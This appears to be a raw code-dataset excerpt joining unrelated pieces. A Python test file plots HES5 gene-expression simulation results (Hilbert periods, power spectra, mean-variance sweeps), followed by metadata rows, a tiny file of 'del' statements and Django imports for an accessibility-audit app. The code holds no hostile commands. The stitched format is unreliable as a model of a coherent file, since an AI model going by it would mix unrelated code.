plt.ylabel('Period [h]')
simulated_stdevs.sort()
experimental_stdevs.sort()
real_simulated_periods.sort()
experimental_periods.sort()
print('number of experimental periods:')
number_of_experimental_periods = len(experimental_periods)
print(len(experimental_periods))
print('number or real_simulated_periods')
number_of_simulated_periods = len(real_simulated_periods)
print(len(real_simulated_periods))
print('product over sum')
print(number_of_experimental_periods*number_of_simulated_periods/(number_of_experimental_periods+
number_of_simulated_periods))
# plt.figure(figsize = [6.5,2.5])
plt.subplot(223)
plt.step(simulated_stdevs, (np.arange(simulated_stdevs.size)+1.0)/simulated_stdevs.size, label = "Model")
plt.step(experimental_stdevs, (np.arange(experimental_stdevs.size)+1.0)/experimental_stdevs.size, label = "Experiment")
plt.legend(loc='lower right')
plt.xlabel('Stdev')
plt.ylabel('Cumulative probability')
plt.subplot(224)
plt.step(real_simulated_periods/60, (np.arange(real_simulated_periods.size)+1.0)/real_simulated_periods.size)
plt.step(experimental_periods, (np.arange(experimental_periods.size)+1.0)/experimental_periods.size)
# plt.axhline(12)
plt.xlabel('Period [h]')
plt.ylabel('Cumulative probability')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','Model_data_period_and_stdev_distribution_comparison.pdf'))
# plt.tight_layout()
# plt.savefig(os.path.join(os.path.dirname(__file__),
# 'output','Kolmogoriv_w_cumulative_plotted.pdf'))
def xest_get_shortened_posterior_hilbert_period_distribution_smoothed_per_cell(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples, measurement_interval = 12*60,
smoothen = True, per_cell = True)
np.save(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods_per_cell'), hilbert_periods)
# hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
# 'shortened_posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods_per_cell.pdf'))
def xest_get_shortened_posterior_hilbert_period_distribution_smoothed(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
# hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples, measurement_interval = 12*60,
# smoothen = True)
# np.save(os.path.join(os.path.dirname(__file__), 'output',
# 'shortened_smoothened_posterior_hilbert_periods'), hilbert_periods)
hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,13), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods.pdf'))
def xest_get_shortened_smoothened_posterior_hilbert_period_distribution_one_sample(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
# hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples,
# measurement_interval = 12*60,
# per_cell = True,
# smoothen = True,
# samples_per_parameter_point = 1)
# np.save(os.path.join(os.path.dirname(__file__), 'output',
# 'shortened_smoothened_posterior_hilbert_periods_per_cell_one_sample'), hilbert_periods)
hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods_per_cell_one_sample.npy'))
hilbert_periods = hilbert_periods[hilbert_periods<10*60]
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'shortened_smoothened_posterior_hilbert_periods_per_cell_one_sample.pdf'))
def xest_get_shortened_posterior_hilbert_period_distribution(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'data',
# 'sampling_results_extended')
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_repeated')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples, measurement_interval = 12*60)
np.save(os.path.join(os.path.dirname(__file__), 'output',
'shortened_repeated_posterior_hilbert_periods'), hilbert_periods)
# hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
# 'shortened_posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'shortened_posterior_hilbert_periods.pdf'))
def xest_get_shortened_posterior_hilbert_period_distribution_per_cell(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'data',
# 'sampling_results_extended')
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_repeated')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples, measurement_interval = 12*60,
per_cell = True)
np.save(os.path.join(os.path.dirname(__file__), 'output',
'repeated_shortened_posterior_hilbert_periods_per_cell'), hilbert_periods)
# hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
# 'shortened_posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'shortened_posterior_hilbert_periods_per_cell.pdf'))
def xest_get_posterior_hilbert_period_distribution_per_cell(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples, per_cell = True)
np.save(os.path.join(os.path.dirname(__file__), 'output',
'posterior_hilbert_periods_per_cell'), hilbert_periods)
# hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
# 'posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'posterior_hilbert_periods_per_cell.pdf'))
def xest_get_posterior_hilbert_period_distribution(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
# hilbert_periods = hes5.calculate_hilbert_periods_at_parameter_points(posterior_samples)
# np.save(os.path.join(os.path.dirname(__file__), 'output',
# 'posterior_hilbert_periods'), hilbert_periods)
hilbert_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
'posterior_hilbert_periods.npy'))
plt.figure(figsize = (4.5,2.5))
plt.hist(hilbert_periods/60, density = True, bins =20, range = (0,10), edgecolor = 'black')
plt.axvline(3.2, color = 'black')
# plt.axvline(0.5, color = 'black')
print('mean observed period is')
print(np.mean(hilbert_periods/60))
# plt.axvline(this_period/60)
plt.xlabel('Period [h]')
# plt.ylim(0,1)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'posterior_hilbert_periods.pdf'))
def xest_in_silico_power_spectrum(self):
time_points = np.linspace(0,20000,10000)
in_silico_data = np.zeros((len(time_points),301))
in_silico_data[:,0] = time_points
for trace_index in range(1,301):
signal_values = np.sin(2*np.pi/220*time_points) + 10*np.random.rand(len(time_points))
in_silico_data[:, trace_index] = signal_values
this_power_spectrum,this_coherence, this_period = hes5.calculate_power_spectrum_of_trajectories(in_silico_data)
plt.figure(figsize = (6.5,2.5))
# plt.subplot(121)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1])
plt.xlim(0,0.01)
plt.xlabel('Frequency [1/min]')
plt.ylabel('Power')
plt.title('Period: ' + '{:.2f}'.format(this_period/60) + 'h, Coherence: ' + '{:.2f}'.format(this_coherence))
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'in_silico_power_spectrum.pdf'))
def xest_try_hilbert_transform(self):
time_points = np.linspace(0,100,10000)
signal_values = np.sin(2*np.pi/1.42*time_points)+10
# time_points = np.linspace(0,15,100)
# signal_values = np.sin(2*np.pi/2*time_points)
analytic_signal = scipy.signal.hilbert(signal_values - np.mean(signal_values))
# analytic_signal = scipy.signal.hilbert(signal_values)
phase = np.angle(analytic_signal)
print(np.signbit(phase).astype(int))
#this will find the index just before zero-crossings from plus to minus
phase_reset_indices = np.where(np.diff(np.signbit(phase).astype(int))>0)
phase_reset_times = time_points[phase_reset_indices]
extracted_periods = np.diff(phase_reset_times)
print(extracted_periods)
print(np.mean(extracted_periods))
plt.figure(figsize = (4,2.5))
plt.plot(time_points, signal_values, label = 'signal')
plt.plot(time_points, phase, label = 'phase')
plt.vlines(phase_reset_times, -4,4, color = 'black')
plt.xlim(0,20)
plt.xlabel("Time")
plt.ylabel("Amplitude")
plt.tight_layout()
plt.legend()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','initial_hilbert_test.pdf'))
plt.figure(figsize = (4,2.5))
signal_values = signal_values + np.random.rand(len(signal_values))
# analytic_signal = scipy.signal.hilbert(signal_values)
analytic_signal = scipy.signal.hilbert(signal_values - np.mean(signal_values))
phase = np.angle(analytic_signal)
phase_reset_indices = np.where(np.diff(np.signbit(phase).astype(int))>0)
phase_reset_times = time_points[phase_reset_indices]
extracted_periods = np.diff(phase_reset_times)
print(extracted_periods)
print(np.mean(extracted_periods))
plt.plot(time_points, signal_values, label = 'signal', lw = 0.1)
plt.plot(time_points, phase, label = 'phase', lw = .1)
plt.vlines(phase_reset_times, -1,1, color = 'black', zorder = 10, lw = .1)
plt.xlabel("Time")
plt.ylabel("Amplitude")
plt.xlim(0,20)
plt.tight_layout()
plt.legend()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','initial_hilbert_test2.pdf'))
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,3]>0.12,
model_results[:,3]<0.17))))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
sample = posterior_samples[2]
these_traces = hes5.generate_langevin_trajectory( 1500*5, #duration
sample[2], #repression_threshold,
sample[4], #hill_coefficient,
np.log(2)/30, #mRNA_degradation_rate,
np.log(2)/90, #protein_degradation_rate,
sample[0], #basal_transcription_rate,
sample[1], #translation_rate,
sample[3], #transcription_delay,
10, #initial_mRNA,
sample[2], #initial_protein,
1000)
plt.figure(figsize = (6.5,2.5))
plt.subplot(121)
signal_values = these_traces[:,2]
time_points = these_traces[:,0]
# analytic_signal = scipy.signal.hilbert(signal_values)
analytic_signal = scipy.signal.hilbert(signal_values - np.mean(signal_values))
phase = np.angle(analytic_signal)
phase_reset_indices = np.where(np.diff(np.signbit(phase).astype(int))>0)
phase_reset_times = time_points[phase_reset_indices]
extracted_periods = np.diff(phase_reset_times)
print(extracted_periods)
print(np.mean(extracted_periods))
plt.plot(time_points, signal_values, label = 'signal', lw = 0.1)
plt.vlines(phase_reset_times, 45000,55000, color = 'black', zorder = 10, lw = .5)
plt.xlabel("Time [min]")
plt.ylabel("Expression")
implemented_periods = hes5.get_period_measurements_from_signal(time_points, signal_values)
self.assert_(np.array_equal(implemented_periods, extracted_periods))
plt.subplot(122)
plt.plot(time_points, phase, label = 'phase', lw = .1)
plt.vlines(phase_reset_times, -1,1, color = 'black', zorder = 10, lw = .5)
plt.xlabel("Time [min]")
plt.ylabel("Phase")
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','initial_hilbert_on_data.pdf'))
plt.figure(figsize = (6.5,2.5))
plt.subplot(121)
smoothened_signal = scipy.signal.savgol_filter(signal_values,
75,
3)
# analytic_signal = scipy.signal.hilbert(signal_values)
analytic_signal = scipy.signal.hilbert(smoothened_signal - np.mean(smoothened_signal))
phase = np.angle(analytic_signal)
phase_reset_indices = np.where(np.diff(np.signbit(phase).astype(int))>0)
phase_reset_times = time_points[phase_reset_indices]
extracted_periods = np.diff(phase_reset_times)
print(extracted_periods)
print(np.mean(extracted_periods))
plt.plot(time_points, smoothened_signal, label = 'signal', lw = 0.1)
plt.vlines(phase_reset_times, 45000,55000, color = 'black', zorder = 10, lw = .5)
plt.xlabel("Time [min]")
plt.ylabel("Expression")
implemented_periods = hes5.get_period_measurements_from_signal(time_points, signal_values, smoothen = True)
self.assert_(np.array_equal(implemented_periods, extracted_periods))
plt.subplot(122)
plt.plot(time_points, phase, label = 'phase', lw = .1)
plt.vlines(phase_reset_times, -1,1, color = 'black', zorder = 10, lw = .5)
plt.xlabel("Time [min]")
plt.ylabel("Phase")
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','initial_hilbert_on_data_smoothened.pdf'))
def xest_ngn_hes5_toy_model(self):
times = np.linspace(0,15,1000)
noise_1 = np.random.randn(len(times))
noise_2 = np.random.randn(len(times))
# noise_1 = 0
# noise_2 = 0
these_hes5_data = 2*np.sin(2*np.pi*times/4.0)-times + 15 + noise_1
these_ngn_data = times + noise_2
plt.figure(figsize = (6.5,6.5))
plt.subplot(421)
plt.plot(times, these_hes5_data, label = 'Hes5')
plt.plot(times, these_ngn_data, label = 'Ngn')
plt.xlabel('Time')
plt.ylabel('Expression')
plt.legend(loc = 'upper left')
plt.subplot(422)
plt.plot(these_hes5_data, these_ngn_data)
plt.xlabel('Hes5 expression')
plt.ylabel('Ngn expression')
these_ngn_data = 2*np.sin(2*np.pi*times/4.0)+times + noise_2
plt.subplot(423)
plt.plot(times, these_hes5_data)
plt.plot(times, these_ngn_data)
plt.xlabel('Time')
plt.ylabel('Expression')
plt.subplot(424)
plt.plot(these_hes5_data, these_ngn_data)
plt.xlabel('Hes5 expression')
plt.ylabel('Ngn expression')
these_ngn_data = 2*np.sin(2*np.pi*times/4.0+np.pi)+times + noise_2
plt.subplot(425)
plt.plot(times, these_hes5_data)
plt.plot(times, these_ngn_data)
plt.xlabel('Time')
plt.ylabel('Expression')
plt.subplot(426)
plt.plot(these_hes5_data, these_ngn_data)
plt.xlabel('Hes5 expression')
plt.ylabel('Ngn expression')
these_ngn_data = np.sin(2*np.pi*times/4.0)*times/2 + times/2 + noise_2
plt.subplot(427)
plt.plot(times, these_hes5_data)
plt.plot(times, these_ngn_data)
plt.xlabel('Time')
plt.ylabel('Expression')
plt.subplot(428)
plt.plot(these_hes5_data, these_ngn_data)
plt.xlabel('Hes5 expression')
plt.ylabel('Ngn expression')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','hes5_ngn_toy_model.pdf'))
def xest_make_variance_vs_mean_bayesian_posterior_prediction(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('total number of accepted samples')
print(len(my_posterior_samples))
my_model_results = model_results[accepted_indices]
my_figure = plt.figure(figsize= (4.5,1.9))
plt.subplot(121)
all_means = my_model_results[:,0]
all_absolute_standard_deviations = my_model_results[:,1]*my_model_results[:,0]
all_variances = all_absolute_standard_deviations*all_absolute_standard_deviations
lower_limit = all_means*0.05
lower_limit = lower_limit*lower_limit
plt.scatter(all_means, all_variances,rasterized = True, alpha = 0.1, s = 1)
plt.plot(all_means, lower_limit)
plt.ylim(0,0.7e8)
plt.ylabel("Variance")
plt.xlabel("Mean HES5")
# plt.xlim(0.03,0.2)
# plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.subplot(122)
sns.kdeplot(all_means, all_variances, linewidths = 0.5, bw = 0.2)
plt.plot(all_means, lower_limit)
plt.ylim(0,0.7e8)
plt.ylabel("Variance")
plt.xlabel("Mean HES5")
plt.tight_layout()
file_name = os.path.join(os.path.dirname(__file__), 'output',
'mean_vs_variance_investigation')
plt.savefig(file_name + '.pdf', dpi = 600)
plt.savefig(file_name + '.png', dpi = 600)
def xest_plot_mean_and_variance_dependence_on_protein_degradation(self):
my_figure = plt.figure( figsize = (2.5, 5.7) )
parameter_name = 'repression_threshold'
# parameter_name = 'protein_degradation_rate'
my_degradation_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'data',
'extended_relative_sweeps_repression_threshold.npy'))
# 'repeated_degradation_sweep.npy'))
# print(my_degradation_sweep_results[0,:,0])
# print(np.log(2)/90)
# my_filtered_indices = np.where(np.logical_and(my_degradation_sweep_results[:,9,4] -
# my_degradation_sweep_results[:,3,4]>
# my_degradation_sweep_results[:,3,4]*1.0,
# my_degradation_sweep_results[:,3,4]>0.1))
# print(len(my_filtered_indices[0]))
# print(len(my_degradation_sweep_results))
# my_degradation_sweep_results = my_degradation_sweep_results[my_filtered_indices]
x_coord = -0.3
y_coord = 1.05
plt.subplot(311)
for results_table in my_degradation_sweep_results:
plt.plot(results_table[:,0],
results_table[:,1], color = 'C0', alpha = 0.02, zorder = 0)
# plt.axvline( np.log(2)/90, color = 'black' )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('relative HES5 degradation')
plt.ylim(40000,90000)
plt.ylabel('Mean Hes5')
# plt.ylim(40000,100000)
# plt.ylim(0,1)
# plt.xlim(0,np.log(2)/15.)
# plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
plt.subplot(312)
for results_table in my_degradation_sweep_results:
variances = results_table[:,2]*results_table[:,1]
variances = variances*variances
plt.plot(results_table[:,0],
variances, color = 'C0', alpha = 0.02, zorder = 0)
# plt.axvline( np.log(2)/90, color = 'black' )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('relative HES5 degradation')
plt.ylabel('Variance')
# plt.ylim(40000,100000)
# plt.ylim(0,1)
# plt.xlim(0,np.log(2)/15.)
# plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
plt.subplot(313)
for results_table in my_degradation_sweep_results:
variances = results_table[:,2]*results_table[:,1]
variances = variances*variances
plt.plot(results_table[:,1],
variances, color = 'C0', alpha = 0.005, zorder = 0)
# plt.axvline( np.log(2)/90, color = 'black' )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('HES5 mean')
plt.ylim(0,1e8)
plt.ylabel('Variance')
plt.xlim(40000,90000)
# plt.ylim(0,0.5e8)
# plt.ylim(40000,100000)
# plt.ylim(0,1)
# plt.xlim(0,np.log(2)/15.)
# plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
plt.tight_layout()
file_name = os.path.join(os.path.dirname(__file__),
'output','hes5_variances_means_vs_' + parameter_name)
plt.savefig(file_name + '.pdf', dpi = 600)
plt.savefig(file_name + '.png', dpi = 600)
def xest_make_plot_for_paper(self):
parameter_name = 'repression_threshold'
# parameter_name = 'protein_degradation_rate'
my_degradation_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'data',
'extended_relative_sweeps_repression_threshold.npy'))
#
means = my_degradation_sweep_results[:,:,1]
standard_deviations = my_degradation_sweep_results[:,:,2]
variances = means*standard_deviations
variances = variances*variances
mean_means = np.mean(means, axis = 0)
mean_variances = np.mean(variances, axis = 0)
std_variances = np.std(variances, axis = 0)
my_figure = plt.figure( figsize = (2.5, 1.9) )
# for results_table in my_degradation_sweep_results:
# variances = results_table[:,2]*results_table[:,1]
# variances = variances*variances
# plt.plot(results_table[:,1],
# variances, color = 'C0', alpha = 0.005, zorder = 0)
# plt.axvline( np.log(2)/90, color = 'black' )
plt.plot(mean_means, mean_variances, color = 'black', lw = 0.5)
plt.plot(mean_means, mean_variances - std_variances, color = 'black', lw = 0.25)
plt.plot(mean_means, mean_variances + std_variances, color = 'black', lw = 0.25)
plt.fill_between(mean_means, mean_variances - std_variances, mean_variances + std_variances, alpha = 0.5)
# plt.errorbar(mean_means, mean_variances,yerr=std_variances)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('HES5 mean')
# plt.ylim(0,1e8)
plt.ylabel('Variance')
plt.xlim(40000,90000)
# plt.ylim(0,0.5e8)
# plt.ylim(40000,100000)
# plt.ylim(0,1)
# plt.xlim(0,np.log(2)/15.)
# plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
plt.tight_layout()
file_name = os.path.join(os.path.dirname(__file__),
'output','hes5_variances_means_vs_' + parameter_name + '_plot_for_paper')
plt.savefig(file_name + '.pdf', dpi = 600)
plt.savefig(file_name + '.png', dpi = 600)
| 57.483326 | 175 | 0.530912 | 56,390 | 544,712 | 4.804274 | 0.019596 | 0.047041 | 0.028171 | 0.044826 | 0.919454 | 0.901847 | 0.881412 | 0.866961 | 0.852178 | 0.84285 | 0 | 0.056921 | 0.362691 | 544,712 | 9,475 | 176 | 57.489393 | 0.723471 | 0.195377 | 0 | 0.780781 | 0 | 0 | 0.098874 | 0.035568 | 0 | 0 | 0 | 0 | 0.002673 | 1 | 0.021239 | false | 0.000149 | 0.001634 | 0 | 0.023021 | 0.041883 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4bf29891a12cfbe58cd0c92f7eb0643aeea7c381 | 25 | py | Python | ast/testdata/del.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | 126 | 2019-07-19T14:42:41.000Z | 2022-03-21T22:22:19.000Z | ast/testdata/del.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | 38 | 2019-08-28T01:46:31.000Z | 2022-03-17T05:46:51.000Z | ast/testdata/del.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | 55 | 2019-08-02T09:32:33.000Z | 2021-12-22T11:25:51.000Z | del c
del a, b
del a, b,
| 6.25 | 9 | 0.56 | 8 | 25 | 1.75 | 0.5 | 0.571429 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.32 | 25 | 3 | 10 | 8.333333 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ef3d95ca2d2af1c71aa7ac2b5940d2d382efef40 | 49,971 | py | Python | faeAuditor/auditGroupResults/views.py | opena11y/fae-auditor | ea9099b37b77ddc30092b0cdd962647c92b143a7 | [
"Apache-2.0"
] | 2 | 2018-02-28T19:03:28.000Z | 2021-09-30T13:40:23.000Z | faeAuditor/auditGroupResults/views.py | opena11y/fae-auditor | ea9099b37b77ddc30092b0cdd962647c92b143a7 | [
"Apache-2.0"
] | 6 | 2020-02-11T21:53:58.000Z | 2022-02-10T07:57:58.000Z | faeAuditor/auditGroupResults/views.py | opena11y/fae-auditor | ea9099b37b77ddc30092b0cdd962647c92b143a7 | [
"Apache-2.0"
] | 1 | 2019-12-05T06:05:20.000Z | 2019-12-05T06:05:20.000Z | """
Copyright 2014-2016 University of Illinois
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
file: auditGroupResults/views.py
Author: Jon Gunderson
"""
from __future__ import absolute_import
from django.shortcuts import render
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.http import JsonResponse
from django.shortcuts import redirect
from django.contrib import messages
from django.views.generic import TemplateView
from django.views.generic import CreateView
from django.views.generic import FormView
from django.views.generic import RedirectView
from django.contrib.auth.models import User
from auditResults.models import AuditResult
from .models import AuditGroupResult
from .models import AuditGroupRuleCategoryResult
from .models import AuditGroupGuidelineResult
from .models import AuditGroupRuleScopeResult
from .models import AuditGroupRuleResult
from auditResults.models import AuditResult
from auditResults.models import AuditRuleCategoryResult
from auditResults.models import AuditGuidelineResult
from auditResults.models import AuditRuleScopeResult
from auditResults.models import AuditRuleResult
from auditGroup2Results.models import AuditGroup2Result
from auditGroup2Results.models import AuditGroup2RuleCategoryResult
from auditGroup2Results.models import AuditGroup2GuidelineResult
from auditGroup2Results.models import AuditGroup2RuleScopeResult
from auditGroup2Results.models import AuditGroup2RuleResult
from websiteResults.models import WebsiteResult
from websiteResults.models import WebsiteGuidelineResult
from websiteResults.models import WebsiteRuleScopeResult
from websiteResults.models import WebsiteRuleCategoryResult
from pageResults.models import PageResult
from pageResults.models import PageRuleCategoryResult
